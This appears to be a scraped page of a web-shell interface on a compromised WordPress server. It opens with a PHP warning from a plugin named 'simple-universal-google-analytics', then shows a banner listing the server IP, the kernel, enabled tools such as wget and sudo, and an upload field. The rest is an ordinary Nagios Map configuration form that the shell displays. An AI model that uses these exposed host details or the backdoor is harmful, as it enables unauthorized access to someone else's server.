Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/local/nagios/share/ |
Upload File : |
<form role="form"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" ng-click="cancel()"> <span aria-hidden="true">×</span> <span class="sr-only">Close</span> </button> <h4 class="modal-title" id="nagiosTrendsLabel"> Nagios Map </h4> </div> <div class="modal-body"> <div class="form-group"> <label>URL for Icons</label> <input type="text" class="form-control" ng-model="params.iconurl" placeholder="http://localhost/nagios/images/logos/"> </div> <div class="form-group"> <label>Layout</label> <select class="form-control" ng-model="params.layout"> <option value="3">Balanced Tree (Horizontal)</option> <option value="7">Balanced Tree (Vertical)</option> <!--option value="4">Circular</option--> <option value="6">Circular Balloon</option> <option value="5">Circular Markup</option> <option value="2">Collapsed Tree (Horizontal)</option> <option value="8">Collapsed Tree (Vertical)</option> <option value="1">Depth Layers (Horizontal)</option> <option value="9">Depth Layers (Vertical)</option> <option value="10">Force Map</option> <option value="0">User Supplied</option> </select> </div> <div class="form-group" ng-show="showDimensions()"> <label>Dimensions (User Supplied Layout Only)</label> <select class="form-control" ng-model="params.dimensions"> <option value="fixed">Fixed</option> <option value="auto">Automatic</option> <option value="user">User Supplied</option> </select> </div> <div class="form-group" ng-show="showCoordinates()"> <label>Upper Left X Coordinate</label> <input type="number" class="form-control" placeholder="0" ng-model="params.ulx"> </div> <div class="form-group" ng-show="showCoordinates()"> <label>Upper Left Y Coordinate</label> <input type="number" class="form-control" placeholder="0" ng-model="params.uly"> </div> <div class="form-group" ng-show="showCoordinates()"> <label>Lower Right X Coordinate</label> <input type="number" class="form-control" placeholder="0" ng-model="params.lrx"> </div> <div class="form-group" ng-show="showCoordinates()"> <label>Lower Right Y Coordinate</label> <input type="number" class="form-control" placeholder="0" ng-model="params.lry"> </div> <div class="form-group"> <label>Root Node</label> <select class="form-control" ng-model="params.root" ng-options="node for node in nodelist track by node"> </select> </div> <div class="form-group"> <label>Maximum Zoom Ratio</label> <input type="text" class="form-control" ng-model="params.maxzoom"> </div> <div class="checkbox"> <label> <input type="checkbox" ng-model="params.nolinks"> Disable Display of Links </label> </div> <div class="checkbox"> <label> <input type="checkbox" ng-model="params.notext"> Disable Display of Text </label> </div> <div class="checkbox"> <label> <input type="checkbox" ng-model="params.nopopups"> Disable Display of Popups </label> </div> <div class="checkbox"> <label> <input type="checkbox" ng-model="params.nomenu"> Disable Display of the Menu Button (and also this dialog!) </label> </div> <div class="checkbox"> <label> <input type="checkbox" ng-model="params.noresize"> Disallow Resizing of Map </label> </div> </div> <div class="modal-footer"> <button id="submit" type="submit" class="btn btn-default" ng-disabled="disableApply()" ng-click="apply()"> Apply </button> </div> </form>